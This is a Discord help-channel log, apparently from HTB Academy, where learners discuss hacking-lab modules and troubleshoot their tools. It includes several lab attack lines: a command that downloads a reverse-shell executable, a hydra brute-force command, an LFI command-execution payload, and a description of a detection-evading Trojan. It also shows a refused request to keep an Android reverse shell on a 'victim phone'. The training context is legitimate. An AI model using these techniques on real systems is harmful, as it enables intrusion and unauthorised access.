Module: Security Monitoring & SIEM Fundamentals
Section: SIEM Visualization Example 2: Failed Logon Attempts (Disabled Users)

#

everythign else i've completed just this left couldnt seem to figure it out

rustic sage
#

just I have no idea what im doing wrong, cant seem to find the document

#

DONE IT

#

now i understand what the hell i was supposed to do

short sentinel
#

Hi, Is SPL stands for splunk processing language or search processing language , I am little bit confused.

ashen fiber
#

Im still stuck on here : Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. - Attacking Common Services: Attacking DNS. I also used IP instead.

image.png
fathom pendant
ashen fiber
fathom pendant
#

that should be the only thing in the resolvers.txt file

#

otherwise it's trying to query a bunch of other name servers

ashen fiber
#

thanks.

cloud urchin
#

did they update that section or something? i used another method entirely

fathom pendant
cloud urchin
#

yeah i do see that on the page but my notes show something else

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

i mean subbrute is used to find the subdomain, then dig or another tool is used to actually query it

cloud urchin
#

yeah maybe that's why

#

yeah i think that's it

olive slate
#

Hi. Can anyone gimme a bit of help on Injection Attacks > Exploitation of PDF Generation Vulnerabilities?

#

Actually nevermind. I solved it

fathom pendant
#

let's not spoil the module; not to mention you replied to something 10 days old, i'd hope they got past it by now

empty trout
#

Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer. i scanned all the ports and got 7 open ports but it is not the correct answer

#

what does the highest port mean

acoustic owl
#

Have you scanned all ports?

empty trout
#

yeah

#

-p-

fathom pendant
#

not the number of ports

#

i.e. ports 2, 3, 22 , 5555, 3000 the highest port is 5555

ashen fiber
fathom pendant
#

or are you asking if you should

#

if you're asking if you should, that's the wrong way to go about it. Do first, ask later if it fails

ashen fiber
civic dawn
#

Hello , Iโ€™m at Broken Authentication Module, Brute-Forcing Passwords Section.

While do this command;
โ€œgrep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > custom_wordlist.txtโ€

Iโ€™m getting this error;
โ€œgrep: rockyou.txt: binary file matchesโ€

empty trout
shut quest
#

Need an embed for don't ask to bash or something like that.

empty trout
#

thanks

fathom pendant
gusty cloak
#

People recommend to do the final module "blind" without help. Can I spawn the machine in the first question and do the entire module that way? Or how am I supposed to spawn the entire environment?

Attacking enterprise networks module

normal sand
fathom pendant
#

don't stop until you reach domain admin

fathom pendant
#

so you can potentially see if there's a running process that might contain credentials for how it was launched

#

actually it's explained literally in the paragraph just before

gusty cloak
fathom pendant
trail egret
#

my xfreerdp connection is getting dropped when i share my local folder to rdp

fathom pendant
fathom pendant
trail egret
#

xfreerdp /u:username /p:password /v:target_ip /drive:shared_folder,/path/to/local/folder

fathom pendant
#

hm

#

i've never had any issues with accessing a shared folder, and your syntax looks right

#

though usually i'm doing something like cp \\tsclient\share\<path to thing i want to cp> with powershell (copy for CMD)

trail egret
#

Yes idk whats wrong : 10:04:19:302] [26175:26176] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[10:04:19:303] [26175:26176] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[10:04:19:303] [26175:26176] [INFO][com.freerdp.client.common] - Network disconnect!

normal sand
fathom pendant
#

note the ssh/sshd

#

check the article i linked

fathom pendant
normal sand
fathom pendant
#

...because that's the command line

#

what you type into

normal sand
fathom pendant
#

no

#

the shell runs on the cmdline

#

:)

#

because this stuff digs deeper than shell languages

normal sand
fathom pendant
#

no

#

i sent it bc it explains also what pts is (which is in the output btw)

#

and what it all means

normal sand
fathom pendant
#

it means it's used by a pty

#

it's what helps facilitate the communication of sent commands

normal sand
#

I see.

fathom pendant
#

the top answer really does explain it

#

also it's not looking for files like cmdline

#

it's looking specifcally at cmdline

#

i can't tell you why they use find /proc instead of just cat

#

but who knows

normal sand
#

I see. Thanks.

gusty cloak
languid kraken
#

How to get to support?

ashen fiber
full wagon
#

Nessus skills assessment: This question doesn't make any sense to me, what exactly are they asking for?: 'What was the target for the authenticated scan?' I have already tried the hostname with small and capital letters, just don't understand the question.

autumn pilot
#

hint - it is not a hostname that is expected

olive slate
#

Is anyone able to give me a nudge on Injection Attacks > Skills Assessment?

pseudo kiln
#

can I ask someone if I completed the windows priv esc assessment II the right way ? I have access to looking at the solution, but I am just interested in confirmation so if I did not do it the right way I can check for other ways.

full wagon
pseudo kiln
fathom pendant
#

Just not the spawn ip

#

Refer to the reading

steady dock
#

Question #1 for Practical Digital Forensics Scenarios
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.

I've extracted pid 6744 with vol.py, I used the cmdline module and couldn't fully decode the powershell command, and nothing related to powerspoilt when I use yara. What am I doing wrong?

fathom pendant
steady dock
fathom pendant
#

Look at the broader picture of what the event id is

#

Sorry

#

Brain fried

#

I meant to say look at all the components of the process

#

Look at what it talks to

steady dock
#

nothing shows up on netscan for that pid

fathom pendant
#

It's found through analysis of the pid

#

Basically though once you dump it just ctrl+f for the different tool names from the repository

#

It's not diving deep into the individual find- or invoke-

#

It's very much a top level which tool was used

steady dock
#

so the tool doesn't start with find or invoke?

fathom pendant
#

No

#

It starts with power

#

I'll give you that

steady dock
#

is that really the intended way to solve this question?

fathom pendant
#

Utilizing the dump will give multiple references to it

steady dock
#

is there a quicker way to do this?

fathom pendant
#

But yes the idea is to extensively look for everything

#

Strings is a good tool

steady dock
#

I was looking for that tool on the vm but I couldn't find it

fathom pendant
#

You gotta transfer it over

#

Download the zip to your machine then transfer

steady dock
#

what .zip?

#

nevermind, I just guessed the answer

blissful elm
#

Secure Coding 101: JavaScript has anyone completed this module

fathom pendant
blissful elm
#

if anyone has completed this pls dm me i wanna know something

safe robin
#

anyone here

fathom pendant
#

Nope we all died

safe robin
# fathom pendant Nope we all died

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

#

i completed it with a hint

#

but i wanna knw how we knw

brittle lotus
#

what module is this from

safe robin
#

that wordpress plugin is used in it?

#

pentesting

brittle lotus
#

you're asking how we know for sure that wordpress is the attack vector?

safe robin
#

i am asking that how we knw that in wordpress simple backup plugin was used like in the scan it told its apache server and wordpress is used but the plugin was not mentioned in it then how we knw that plugin can be attack vector

brittle lotus
#

most of us will immediately turn to wpscan since it's a wordpress box

safe robin
#

ohkye

#

acutally i done it with metasploit maybe thats why i was curious

#

wpscan tell which plugins are being used? but how that tool fingerprint these plugins

brittle lotus
#

yes it does check plugins, and i believe it's a combination of crawling and fuzzing

fathom pendant
#

Also wpscan isn't needed if it's the module I'm thinking

#

Just visiting the web page

grand thistle
#

I don't know if I can ask questions here, but for module Intro to Network Traffic Analysis section Packet Inception, Dissecting Network Traffic With Wireshark, I was able to get the photo but How do I get the username? I checked the forum and found the username. I didn't know if there is a better way than just searching the name in wireshark.

safe robin
full wagon
fathom pendant
safe robin
fathom pendant
#

It's an educated guess

#

All signs pointed to that plugin

safe robin
#

so its called think out of the box then

fathom pendant
#

I mean the box tells you what's in it

#

But generally you're always making an educated guess based on what you see when it comes to hacking

#

You don't know for sure if the exploit will work, but all signs you see point to saying it should work

twilit sentinel
#

i am a newbie, if i have vhost like freithg.htb and ip:port, what should i write in /etc/hosts? Should i include port

fathom pendant
#

You put the ip and vhost

#

And you always specify the port in your requests such as in a browser or with a tool

#

http://vhost.htb:port/

twilit sentinel
#

oh, thanks a lot

fathom pendant
#

The hosts file is a local dns, and dns doesn't use ports

dense eagle
#

Hi can i DM you?

fathom pendant
#

Considering you had to dig 7 months to find the message to reply to

dense eagle
fathom pendant
#

Well he's not obligated to give guidance :p

stiff bone
#

For those who have difficulties in Introduction to Windows Evasion Techniques SA 1. I advise you to review your Trojan. Pay attention to its architecture and the methods you use. I went away from the provided template in the module, and wrote my own Trojan, which simplified the logic of work, but encrypted all kernel32 calls, as well as everything else. I also advise you to pay attention to the dll signatures, be careful, you need 64-bit versions. And I do not advise you to write tired, take breaks, they really help to reconsider your ideas

fathom pendant
#

You can just ask here (while trying to avoid spoilers) instead of waiting for staff to say y/n to a dm

dense eagle
fathom pendant
#

More recently

#

Was more my point

#

Rather than dig for a message from 7 months ago

dense eagle
fathom pendant
#

Feels like you just dug for the module author instead of looking for similar questions

dense eagle
stoic crown
#

Hello everyone! I am currently doing "Introduction to Bash Scripting" module and i am stuck with "Conditional Execution" question where i need to print the amount of characters in the 35th iteration of var.

I tried doing the following script, and the result is wrong. I am also aware at this point about wc -c adding extra char at the end to the counter. But even if i take 1 from the final answer it is still wrong for some reason. Can someone please point me in the right direction or correct me?

var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
        var=$(echo -n "$var" | base64)

        if [ $counter -eq 35 ]
        then
            echo -n "$var" | wc -c
        fi
done
dense eagle
quaint current
#

Hi,

Section:
Information Gathering - Web Edition
Creepy Crawlies

Question: After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.

So I have installed Reconspider.py, and I get some errors in my output:

...
"twisted.internet.error.DNSLookupError: DNS lookup failed: no results for hostname lookup: www.inlanefreight.com.
2024-09-16 06:27:19 [scrapy.core.engine] INFO: Closing spider (finished)
2024-09-16 06:27:19 [scrapy.utils.signal] ERROR: Error caught on signal handler: <function Spider.close at 0x7fd152ef1f80>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.11/site-packages/scrapy/utils/defer.py", line 348, in maybeDeferred_coro
result = f(*args, **kw)
File "/usr/lib/python3/dist-packages/pydispatch/robustapply.py", line 55, in robustApply
return receiver(*arguments, **named)
File "/home/kali/.local/lib/python3.11/site-packages/scrapy/spiders/init.py", line 101, in close
return cast(Union[Deferred, None], closed(reason))
File "/opt/ReconSpider.py", line 102, in closed
with open('results.json', 'w') as f:
PermissionError: [Errno 13] Permission denied: 'results.json'"
...

Any suggestion?

spare stone
#

Hi Everyone
I am doing gobuster bruteforce vhosts on target ip, it is working well, but no results
Module: info gathering web
Section: Virtual hosts

Can anyone help me?

safe star
#

Looks like you used the ip instead of the domain name

#

Add the domain to ur /etc/hosts file then try again

opal nexus
#

Does anyone else currently experiences Lags on the HTB Academy website?

wary heath
#

Hey friends how are you? I made a android reverse shel using metsploit framework,,i wanna persistent this app in victim phone,,,any body help me?please!!

fathom pendant
#

This isn't the channel nor server for that

#

We don't do really any phone hacking here

storm elk
#

As Marcie said, not the place for this. Doesn't sound legal either the way you put it

fathom pendant
#

If you want to figure out persistence use your own phone

umbral spade
tacit bay
#

is academy broken right now?

storm elk
#

Academy seems to be having issues too

#

It seems to be getting better on academy atm

umbral spade
#

its loading the content just not the tests at the bottom

storm elk
#

I can load my dashboard again

#

yheah I had issues clicking Show Solution

tacit bay
#

yeah even just loading some of the modules isn't working - all the different pathways aren't showing up

opal nexus
fleet pawn
#

Hi guys im doing the linux fundamentals module but i have problems doing the first exercise

#

there is a botton who says download vpn connection file but i dont know what i have to do

#

and under that "start instance" for doing the exercise but it doesnt work neither

fathom pendant
#

The vpn is for doing exercises on your own machine

#

The start instance button should start a vm which is usable in the browser

fleet pawn
#

i click in instnce button but it doesnt work

fathom pendant
#

Currently appears some htb services are having issues

#

Probably gonna have to come back to it in a few hours

fleet pawn
#

Target(s): Fetching status... what does it mean?

#

maybe the exercise is conecting with my own machine in htb server because it says this: SSH to with user "htb-student" and password "HTB_@cademy_stdnt!"

#

It the linux fundamentals module. Someone know if this is correct?

fathom pendant
#

as I just said though, it seems something is going on in htb backend

#

So you may just need to step away for now

fathom pendant
#

It's spawning a target that you'd connect to with those credentials to ssh into

fleet pawn
#

ok, thanks.
Sorry for the inconvenience. Im new and english is not my native language

fathom pendant
#

I suggest coming back to it in a few hours as there are currently problems going on

#

I suggest as well doing the introduction to academy module

magic lake
#

i cant access to any academy module . they are not loading . every other tab work fine idk why

uncut ocean
#

Can anyone help me clearing a small doubt regarding Socat Redirection with a Reverse Shell

lusty thicket
uncut ocean
#

Cool so in this scenario i first get a meterpreter shell of the ubuntu server and my aim is getting a rev shell in window which i can access through ubuntu , so after getting shell then i use portfrw command to forward port and connect window through rdp then when i try to download the .exe rev shell and i open python server in the ubuntu host andhere according to my logic i have to put the ip address of ubuntu server in Invoke-WebRequest command so that it can download the file but here it gives error but when i put window ip insted it downloads the file why??

# 
Invoke-WebRequest -Uri "http://172.16.5.129:8831/backupscript.exe" -OutFile "C:\Users\Public\backupscript.exe"```
#

here this 172.x.x.x is ip of that window machine and through this i can download the file which i host in ubuntu server through python server

#

but the ip of ubuntu is 10.129.73.35

#

and it showing error when i try with this

next bronze
#

you'd need a host that is connected to both networks

#

since you're able to run commands on the windows host, just do the same thing but reversed

oblique jungle
fathom pendant
oblique jungle
fathom pendant
#

That's the pwnbox/vpn ip

#

The target ip is from the "Click here to spawn target"

#

"Spawn instance" spawns the in-browser vm (pwnbox)

oblique jungle
fathom pendant
#

Targets will generally be in one of two forms

#

10.129.x.x for those requiring the vpn

#

Or some publicIP:port for ones that don't

oblique jungle
fathom pendant
#

(Introduction to academy module should go over this)

oblique jungle
fathom pendant
#

๐Ÿ‘

#

It's not the first nor last time I'll have explained this

oblique jungle
median gale
#

Anyone else having troubles spawning targets?

quiet trout
#

try logging out and logging back in

fathom pendant
#

Did you delete all the hashes from the file and end it with a new-line? Also did you recompile

fading perch
fathom pendant
#

You'll need to recompile in order to try and connect

median gale
fading perch
fathom pendant
#

You need to recompile the code in order for it to actually do the changes you made

fading perch
fathom pendant
#

Well if you did it right it should log you in

#

ยฏ_(ใƒ„)_/ยฏ

#

Did you change the name of the new jar?

fleet pawn
#

hi, im trying to install the academy vpn in my vm parrot but "Options error: In [CMD-LINE]:1: Error opening configuration file: academy-regular.ovpn"
Someone know why is this?

limber river
bronze heron
limber river
bronze heron
# limber river why are using the `H=authorization.....`

I get it , it was extra its my mistake .
Currently I using this command

hydra -l user -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt 94.237.56.198 -s 36774 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^ :S=HTB{" -f

Still not getting any result and I tried more than 10 different wordlists too.

limber river
bronze heron
quiet trout
#

you left out your uh... whats it called, your error trigger. and also your rate limit option

#

i mentioned this to you yesterday

#

@bronze heron ^ check the cheat sheet and model your cmd after that. it looks mostly good

median gale
#

Found a the subdomain but not the flag figgured it would be in dig but nothing

72248B63-B210-4A41-ACC6-EF9D943AC01F.png
quiet trout
median gale
quiet trout
#

link me to the module/section you're doing

median gale
quiet trout
#

ok this isnt the one i did previously, did you check for VHOSTs as well?

#

not sure i can be of much help other than suggestions

#

also dig TXT sub.example.com in case its in the txt files? i think thats how the cmd goes

#

sounds like you did some digging already tho, did you try that?

limber river
quiet trout
#

i think he's trying to pull flag data, i dont have the cheat sheet in front of me but i think thats the error trigger (or w/e its called) it needs to be revised (or added) with the /exact/ way its marked up in the source... <-- @bronze heron

#

his previous example, which was more close to the working payload, had it but the source was not fully correct

limber river
quiet trout
# limber river the best way to do it is to detect based on bad string like `F=....`

yeah, thats what it needs to be. his previous cmd was closer to getting him where he needed to be, all the esoteric friggin triggers in hydra... @bronze heron go back in the section and make note of how they use the cmds to get what they want and model yours after it very closely. keep your wordlist as that is likely correct. you may also need to download or unzip rockyou.txt and use the whole one (now or at some point later [maybe...] )

#

keep a specific eye out for the error trigger and /specifically/ how they input the source. im talking errant apostrophes and semicolons and stuff... syntax

#

your error trigger string needs to match the EXACT source ( a substring of it )

bronze heron
quiet trout
#

just like in the explanation

#

i suggested you also try the variation on the http-post-form (http-post-form://) as a sanity check, you dont have an http scheme on your IP in that cmd, that may be causing problems... but yes that is close. look at your error string its wrong.

#

and i think -t4 needs a space? might as well put one just to be safe

median gale
quiet trout
#

you should be able to bump it up... double it at least, i think i used -t 64 on that without issues

limber river
quiet trout
#

ah its an A record... hmm... have you tried a zone transfer?

quiet trout
limber river
#

yeah that could help

median gale
quiet trout
#

then AXFR attempt failing dig any if AXFRs werent discussed in the section skip that, its very niche and rarely occurs in modern day, unless you're North Korea

median gale
quiet trout
#

dig any should return all records, if memory serves

limber river
quiet trout
#

not just TXT

limber river
#

and it's better to use @dnsserver

#

so you query this server

quiet trout
limber river
#

could you show us your command @median gale

median gale
#

Thank you though โค๏ธ

limber river
#

nice

quiet trout
#

rock on

limber river
#

it's better to delete this, it may spoils on others

quiet trout
#

@limber river speaking of @dnsserver is this pretty reliable even in the instance of DNSs with delegations (like in ADDS domains) where a subdomains dns delegation is relegated to a DNS server in the parent domain?

#

i would imagine the forwarding occurs same as normal, just curious

#

or other more granular configs than your "typical" DNS

#

whatever the case may be

limber river
#

this snippet from dig manual

quiet trout
#

oh i see

limber river
#

if you don't specify the server using @ it will check the /etc/resolv.conf

quiet trout
#

didnt realize just /how/ important @dnsserver was

limber river
tender nimbus
#

Hey guys, i dont really understand the question^^ : After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.

limber river
tender nimbus
limber river
#

why ?

#

are you sure your vpn connection is good ?

tender nimbus
#

ow right

#

didnt activated it -_-

limber river
quiet trout
limber river
quiet trout
#

finally its not me this time ๐Ÿ˜›. i guess my turns next.

twilit sentinel
#

Guys, are y'all targets working?

#

In academy

quiet trout
#

working an LFI module https://academy.hackthebox.com/module/23/section/1493

and a syntax im unfamiliar with has been used with ZIP LFIs, this shouldnt spoil but a string like

http://target.com/index.php?param=zip://archive.jpg%23shell.php&cmd=id is used.

the %23 (# fragment) is used here... i dont understand the specific syntax in the given context... is this gonna be a URL fragment, or something different? i understand what its doing but not /why/...

nvm chatgpt gave me a somewhat stomachable answer...

HTB Academy : Cybersecurity Training

Login to HTB Academy and continue levelling up your cybsersecurity skills.

#

maybe i need to look at the zip wrapper? if this is not markup related?

limber river
twilit sentinel
#

yeah, but i am using another server

#

and it worked when i just restarted vpn connection

#

ty

viral lotus
quiet trout
#

if i understand how it works, correctly. i checked the php wrapper docs and zlib:// docs and didnt really see that mentioned specifically. but that seems to be how its working

viral lotus
#

its just url encoding, burpsuite will do it for you if you use it and there are tools online. Its just so its in a readable format for the computer

quiet trout
#

Yeah, i understand the use of the character, just not why it worked in that context exactly. I think i got a handle on it now though. Ive only seen the frag char used to refer to content sections on web pages and from what i understood only was processed client side by the browser so i was surprised.

dusk pond
#

Yooo
Just thinking about going for the CPTS exam !!

Any study tips ?

quiet trout
#

that being said, i do wonder if the browser is storing the contents of the zip data? as i understood it # was not processed server side... this has got me curious again

#

or why that would ultimately matter, considering the zip contents are used for an inclusion on the server.

acoustic owl
median gale
#

Any nudges ? Got the username but no luck against password with any of the services using hydra

2A5F3BE5-248A-4182-B1DB-55BA42533327.png
viral lotus
#

has the site just gone down?

pseudo kiln
#

for me yes 502

viral lotus
#

ok not just me then

#

good job I wrote notes lol

lunar dagger
#

for me it says the academy has a 3rd party issue

pseudo kiln
#

it's back now

quiet trout
#

yeah its spotty they're working on it.

err.png
#

im gonna take a lil break now come back in a bit hopefully its sorted.

unkempt rune
#

is HTBA down?

wanton idol
#

seems that way

lunar dagger
#

i can still work on it but it has that warning there

subtle flicker
# viral lotus

Just got the same xD and was just sending a flag ๐Ÿ˜ญ

viral lotus
#

tbf there was pre-warning above ^ that there have been issues so, it is what it is

languid fjord
#

We are aware of the issues and working on it

#

If anyones exam is impacted, reach out to customer support and we'll make it right

fathom pendant
languid fjord
hollow ibex
loud dagger
#

does anyone else ever have absolutely no idea how to answer a question in academy and have to get the answer from a writeup and think "how the fuck was i supposed to figure that out"

#

is this normal or am i doing something wrong

fathom pendant
#

The module should teach you or give you the tools to be able to figure the answer out

rustic sage
#

Module = command injection

I am url encoding \n in burpsuite, but it gives "%5c%6e" instead of %0a.. i used both, the decoder and the "right click" one!!!!

fathom pendant
#

It's not counting it as a character

rustic sage